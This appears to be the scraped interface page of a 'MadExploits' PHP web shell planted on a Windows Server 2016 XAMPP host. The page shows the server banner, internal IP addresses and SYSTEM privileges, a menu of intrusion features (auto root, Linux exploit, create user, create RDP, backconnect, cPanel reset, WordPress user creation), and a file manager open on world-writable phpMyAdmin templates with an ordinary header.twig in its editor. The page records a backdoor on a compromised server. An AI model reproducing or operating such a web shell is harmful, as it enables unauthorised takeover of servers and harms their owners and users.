Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
columns_definitions
[ DIR ]
drwxrwxrwx
components
[ DIR ]
drwxrwxrwx
config
[ DIR ]
drwxrwxrwx
console
[ DIR ]
drwxrwxrwx
database
[ DIR ]
drwxrwxrwx
display
[ DIR ]
drwxrwxrwx
encoding
[ DIR ]
drwxrwxrwx
error
[ DIR ]
drwxrwxrwx
export
[ DIR ]
drwxrwxrwx
home
[ DIR ]
drwxrwxrwx
javascript
[ DIR ]
drwxrwxrwx
list
[ DIR ]
drwxrwxrwx
login
[ DIR ]
drwxrwxrwx
navigation
[ DIR ]
drwxrwxrwx
preferences
[ DIR ]
drwxrwxrwx
rte
[ DIR ]
drwxrwxrwx
server
[ DIR ]
drwxrwxrwx
setup
[ DIR ]
drwxrwxrwx
sql
[ DIR ]
drwxrwxrwx
table
[ DIR ]
drwxrwxrwx
test
[ DIR ]
drwxrwxrwx
changelog.twig
475
B
-rw-rw-rw-
checkbox.twig
367
B
-rw-rw-rw-
create_tracking_version.twig
3.69
KB
-rw-rw-rw-
div_for_slider_effect.twig
694
B
-rw-rw-rw-
dropdown.twig
502
B
-rw-rw-rw-
filter.twig
303
B
-rw-rw-rw-
fk_checkbox.twig
218
B
-rw-rw-rw-
footer.twig
388
B
-rw-rw-rw-
gis_data_editor_form.twig
12.2
KB
-rw-rw-rw-
header.twig
2.54
KB
-rw-rw-rw-
header_location.twig
652
B
-rw-rw-rw-
preview_sql.twig
301
B
-rw-rw-rw-
radio_fields.twig
397
B
-rw-rw-rw-
scripts.twig
673
B
-rw-rw-rw-
secondary_tabs.twig
147
B
-rw-rw-rw-
select_all.twig
384
B
-rw-rw-rw-
select_lang.twig
872
B
-rw-rw-rw-
start_and_number_of_rows_panel...
808
B
-rw-rw-rw-
theme_preview.twig
504
B
-rw-rw-rw-
themes.twig
233
B
-rw-rw-rw-
toggle_button.twig
1014
B
-rw-rw-rw-
transformation_overview.twig
1.25
KB
-rw-rw-rw-
view_create.twig
4.69
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.twig
{% if not is_ajax and is_enabled -%} <!doctype html> <html lang="{{ lang }}" dir="{{ text_dir }}"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> {% if not allow_third_party_framing -%} <style id="cfs-style">html{display: none;}</style> {%- endif %} <link rel="icon" href="favicon.ico" type="image/x-icon"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"> {% if is_print_view %} <link rel="stylesheet" type="text/css" href="{{ base_dir }}print.css?{{ version }}"> {% else %} <link rel="stylesheet" type="text/css" href="{{ theme_path }}/jquery/jquery-ui.css"> <link rel="stylesheet" type="text/css" href="{{ base_dir }}js/vendor/codemirror/lib/codemirror.css?{{ version }}"> <link rel="stylesheet" type="text/css" href="{{ base_dir }}js/vendor/codemirror/addon/hint/show-hint.css?{{ version }}"> <link rel="stylesheet" type="text/css" href="{{ base_dir }}js/vendor/codemirror/addon/lint/lint.css?{{ version }}"> <link rel="stylesheet" type="text/css" href="{{ theme_path }}/css/theme{{ text_dir == 'rtl' ? '-rtl' }}.css?{{ version }}&nocache= {{- unique_value }}{{ text_dir }}{% if server is not empty %}&server={{ server }}{% endif %}"> <link rel="stylesheet" type="text/css" href="{{ theme_path }}/css/printview.css?{{ version }}" media="print" id="printcss"> {% endif %} <title>{{ title }}</title> {{ scripts|raw }} <noscript><style>html{display:block}</style></noscript> </head> <body{{ body_id is not empty ? ' id=' ~ body_id }}> {{ navigation|raw }} {{ custom_header|raw }} {{ load_user_preferences|raw }} {% if not show_hint %} <span id="no_hint" class="hide"></span> {% endif %} {% if is_warnings_enabled %} <noscript> {{ 'Javascript must be enabled past this point!'|trans|error }} </noscript> {% endif %} {% if is_menu_enabled and server > 0 %} {{ menu|raw }} <span id="page_nav_icons"> <span id="lock_page_icon"></span> <span id="page_settings_icon"> {{ get_image('s_cog', 'Page-related settings'|trans) }} </span> <a id="goto_pagetop" href="#">{{ get_image('s_top', 'Click on the bar to scroll to top of page'|trans) }}</a> </span> {% endif %} {{ console|raw }} <div id="page_content"> {{ messages|raw }} {% endif %} {% if is_enabled and has_recent_table %} {{ recent_table|raw }} {% endif %}
Close